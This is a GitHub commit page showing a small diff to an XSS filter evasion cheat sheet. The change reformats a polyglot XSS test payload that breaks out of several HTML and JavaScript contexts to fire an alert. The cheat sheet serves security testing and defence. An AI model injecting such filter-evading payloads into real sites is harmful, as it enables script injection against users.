Skip to content

Commit

Permalink
Update XSS_Filter_Evasion_Cheat_Sheet.md
Browse files Browse the repository at this point in the history 
XSS Locator (Polygot):
- added newline
- added `
  • Loading branch information
@daivdwe
daivdwe committed Dec 7, 2023
1 parent 1080d9e commit 81f7eff
Showing 1 changed file with 4 additions and 1 deletion.
5 changes: 4 additions & 1 deletion cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -18,7 +18,10 @@ This is a normal XSS JavaScript injection, and most likely to get caught but I s

The following is a "polygot test XSS payload." This test will execute in multiple contexts including html, script string, js and URL. Thank you to [Gareth Heyes](https://twitter.com/garethheyes) for this [contribution](https://twitter.com/garethheyes/status/997466212190781445).

`javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>`
```
javascript:/*--></title></style></textarea></script></xmp>
<svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>
```

### Malformed A Tags

Expand Down

0 comments on commit 81f7eff

Please sign in to comment.